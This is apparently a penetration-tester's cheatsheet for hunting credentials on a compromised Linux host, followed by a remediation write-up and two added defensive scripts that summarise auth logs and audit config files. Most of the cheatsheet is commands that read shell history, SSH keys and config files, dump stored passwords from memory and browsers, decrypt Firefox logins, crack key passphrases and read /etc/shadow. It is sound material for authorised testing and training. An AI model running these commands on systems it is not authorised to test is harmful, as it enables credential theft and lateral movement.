🛡️ Methodology Checklist
- History files: cat ~/.bash_history; cat ~/.zsh_history
- Config files: find / -name "*.conf" -o -name "*.config" 2>/dev/null | xargs grep -l "pass"
- SSH keys: find / -name "id_rsa" -o -name "id_ed25519" 2>/dev/null
- Browser saved credentials: Firefox profiles, Chromium Login Data
- Scripts with hardcoded creds: grep -r "password\|passwd\|pwd" /opt /srv /home 2>/dev/null
- Log files: grep -r "password\|Authorization" /var/log 2>/dev/null
- Crontabs and service configs: cat /etc/crontab; ls /etc/cron.d/
🎯 Operational Context
Use when: Linux foothold acquired — systematically hunt for credentials in config files, history, environment variables, SSH keys, and service credentials.
Think Dumber First: grep -ri 'password' /etc/ 2>/dev/null and cat ~/.bash_history — run these immediately after getting a shell. History files are the most underrated credential source. Then check /var/www/html/ for database connection strings.
Skip when: Already have root — dump /etc/shadow directly instead of hunting.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| for l in .conf .config .cnf; do find / -name "*$l" 2>/dev/null \| grep -v -e lib -e fonts -e share -e core; done | Find all config files by extension |
| for i in $(find / -name "*.cnf" 2>/dev/null \| grep -v -e doc -e lib); do grep -e user -e password -e pass "$i" 2>/dev/null \| grep -v "#"; done | Grep inside config files for credential keywords |
| for l in .sql .db ".*db" ".db*"; do find / -name "*$l" 2>/dev/null \| grep -v -e doc -e lib -e headers -e share -e man; done | Find database files |
| find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \) | Find text files and extensionless files in home dirs |
| for l in .py .pyc .pl .go .jar .c .sh; do find / -name "*$l" 2>/dev/null \| grep -v -e doc -e lib -e headers -e share; done | Find scripts that may contain hardcoded credentials |
| cat /etc/crontab && ls -la /etc/cron.*/ | Check system cronjobs for credential usage |
| tail -n 5 /home/*/.bash_history /home/*/.zsh_history 2>/dev/null | Check shell history for typed passwords/SSH commands |
| sudo python3 mimipenguin.py | Dump cleartext creds from memory (GNOME Keyring, vsftpd) |
| sudo python2.7 laZagne.py all | Run LaZagne — dump all stored credentials |
| python3 laZagne.py browsers | LaZagne — browsers only |
| ls -l ~/.mozilla/firefox/ | Locate Firefox profile directory |
| cat ~/.mozilla/firefox/*.default-release/logins.json \| jq . | View Firefox saved logins (encrypted) |
| python3 firefox_decrypt.py | Decrypt Firefox stored credentials |
🔬 Deep Dive & Workflow
Search Priority by Location
- Config files — services store DB passwords, API keys, SMTP credentials in plaintext
- Scripts/cronjobs — automation scripts commonly hardcode credentials
- History files — ~/.bash_history, ~/.zsh_history capture typed passwords
- Databases — SQLite files (Firefox, application data) contain stored credential data
- Memory — active sessions may have cleartext credentials accessible via mimipenguin
Config File Deep Search

```bash
# Find all .conf/.config/.cnf files, excluding system noise
for l in .conf .config .cnf; do
    echo -e "\nExtension: $l"
    find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"
done

# Grep inside .cnf files for credential keywords, dropping commented lines
for i in $(find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib"); do
    echo -e "\nFile: $i"
    grep "user\|password\|pass" "$i" 2>/dev/null | grep -v "#"
done
```

Log Analysis

```bash
# Pull authentication-related lines out of every regular file under /var/log
# (case-insensitive: auth.log writes "Accepted password", "Failed password")
for i in $(find /var/log -type f 2>/dev/null); do
    GREP=$(grep -i "accepted\|session opened\|failure\|failed\|ssh\|password changed\|sudo\|COMMAND=" "$i" 2>/dev/null)
    if [[ $GREP ]]; then echo -e "\n#### Log file: $i"; echo "$GREP"; fi
done
```

Common logs: /var/log/auth.log, /var/log/syslog, /var/log/cron
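An added example, not from the original cheatsheet: the same auth-log keywords as the grep above, but summarised per user and event type so a reviewer sees at a glance who logged in, who failed, who changed a password and who ran sudo. It assumes the usual syslog line layout (timestamp, host, program, message); the log lines it reads are constructed sample data.

```bash
#!/usr/bin/env bash
# Added example: per-user triage summary of the auth-log events the cheatsheet
# greps for. Assumes syslog layout "Mon DD HH:MM:SS host prog[pid]: message".

# summarize_auth FILE -> sorted lines of "EVENT user count"
summarize_auth() {
    awk '
        # the user name follows the word "for"; "for invalid user NAME" shifts it by two
        function user_after_for(   i) {
            for (i = 1; i <= NF; i++)
                if ($i == "for") return ($(i+1) == "invalid") ? $(i+3) : $(i+1)
            return "?"
        }
        /sshd\[[0-9]+\]: Accepted /               { c["ACCEPTED " user_after_for()]++ }
        /sshd\[[0-9]+\]: Failed password/         { c["FAILED " user_after_for()]++ }
        /passwd\[[0-9]+\]: password changed for/  { c["PASSWD_CHANGED " user_after_for()]++ }
        /sudo: .* COMMAND=/                       { c["SUDO " $6]++ }   # $6 = invoking user
        END { for (k in c) print k, c[k] }
    ' "$1" | sort
}

# make_sample_log -> prints the path of a temp file holding constructed auth.log lines
make_sample_log() {
    local f; f=$(mktemp)
    cat > "$f" <<'EOF'
Jan 10 09:58:12 web01 sshd[2101]: Failed password for invalid user admin from 10.0.0.5 port 51122 ssh2
Jan 10 09:58:15 web01 sshd[2101]: Failed password for invalid user admin from 10.0.0.5 port 51122 ssh2
Jan 10 09:59:02 web01 sshd[2130]: Accepted password for alice from 10.0.0.7 port 50211 ssh2
Jan 10 09:59:02 web01 sshd[2130]: pam_unix(sshd:session): session opened for user alice by (uid=0)
Jan 10 10:00:01 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Jan 10 10:02:40 web01 passwd[2188]: password changed for alice
Jan 10 10:03:11 web01 sshd[2201]: Accepted publickey for deploy from 10.0.0.9 port 40022 ssh2
EOF
    printf '%s' "$f"
}

# Usage on a real host: summarize_auth /var/log/auth.log. Self-contained run on the sample:
sample_log=$(make_sample_log)
summarize_auth "$sample_log"
rm -f "$sample_log"
```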
Memory Credential Tools
- Mimipenguin — targets GNOME Keyring, vsftpd, SSH agent; requires root
- LaZagne — broader coverage: browsers, Wi-Fi, git, Docker, sysadmin tools (WinSCP, FileZilla)
Firefox Credential Decryption
Firefox encrypts saved logins in ~/.mozilla/firefox/*.default-release/:
- logins.json — encrypted username/password pairs
- key4.db — encryption key database
Use firefox_decrypt.py to extract plaintext from both files together.
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| grep on /etc returns too much noise | Too many false positives | Refine: grep -ri 'password' /etc/ --include='*.conf' 2>/dev/null \| grep -v '#' |
| bash_history is empty or deleted | History disabled or cleared | Check: /root/.bash_history, /home/*/.bash_history, .zsh_history; also strings /proc/*/environ |
| SSH keys found but passphrase protected | Key encrypted | Try john: ssh2john id_rsa > id_rsa.hash && john id_rsa.hash --wordlist=rockyou.txt |
| Database config found but password hashed | Hash in config | Identify hash type with hash-identifier; crack with hashcat |
| linpeas/pspy not available | No internet or restricted shell | Run manual checks: find / -name '*.conf' 2>/dev/null \| xargs grep -l 'pass' 2>/dev/null |
📝 Reporting Trigger
Finding Title: Plaintext Credentials Found in Linux Configuration Files
Impact: Plaintext credentials stored in application config files, shell history, or environment variables allow immediate privilege escalation or lateral movement without requiring any vulnerability exploitation.
Root Cause: Application credentials stored as plaintext in version-controlled or world-readable files. No secrets management solution implemented.
Recommendation: Implement secrets management (HashiCorp Vault, AWS Secrets Manager). Restrict config file permissions to service account only. Clear shell history on shared systems. Audit all config files for plaintext credential storage.
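An added example, not part of the original cheatsheet: the Recommendation's "audit all config files for plaintext credential storage" and the Deep Dive's config search done from the auditing side. It reports each uncommented credential assignment in *.conf/*.cnf/*.config files together with the file mode, flagging files readable by anyone other than their owner. Assumes GNU stat (Linux); the config files it scans are constructed sample data.

```bash
#!/usr/bin/env bash
# Added example: audit config files for plaintext credential assignments and
# report whether each file is readable beyond its owner. Assumes GNU stat.

# audit_configs DIR -> one line per hit: path|key|mode|EXPOSED or OWNER_ONLY
audit_configs() {
    local dir="$1" f line key mode perm
    find "$dir" -type f \( -name '*.conf' -o -name '*.cnf' -o -name '*.config' \) 2>/dev/null |
    while IFS= read -r f; do
        # uncommented lines that assign a credential-looking key ("key=" or "key:")
        grep -Ei '^[[:space:]]*[^#;]*(password|passwd|secret|api_key|token)[[:space:]]*[=:]' "$f" 2>/dev/null |
        while IFS= read -r line; do
            key=$(printf '%s' "$line" | sed -E 's/^[[:space:]]*([^=:]*[^[:space:]=:])[[:space:]]*[=:].*/\1/')
            mode=$(stat -c '%a' "$f")
            # any group-read or other-read bit (octal 044) exposes the secret beyond the owner
            if [ $(( 8#$mode & 8#044 )) -ne 0 ]; then perm=EXPOSED; else perm=OWNER_ONLY; fi
            printf '%s|%s|%s|%s\n' "$f" "$key" "$mode" "$perm"
        done
    done
}

# make_sample -> prints the path of a temp directory holding constructed config files
make_sample() {
    local dir; dir=$(mktemp -d)
    mkdir -p "$dir/app" "$dir/lib"
    printf '[client]\nuser=app\npassword=Summer2024!\n' > "$dir/app/my.cnf"          # world-readable hit
    printf '# password=old (commented out)\nhost=db.internal\n' > "$dir/app/db.conf"  # no hit
    printf 'api_key: abc123\n' > "$dir/app/service.config"                            # owner-only hit
    printf 'password=x\n' > "$dir/lib/notes.txt"                                      # wrong extension, skipped
    chmod 644 "$dir/app/my.cnf" "$dir/app/db.conf"; chmod 600 "$dir/app/service.config"
    printf '%s' "$dir"
}

# Usage on a real host: audit_configs /etc (as the auditing account). Self-contained run on the sample:
sample_dir=$(make_sample)
audit_configs "$sample_dir"
rm -rf "$sample_dir"
```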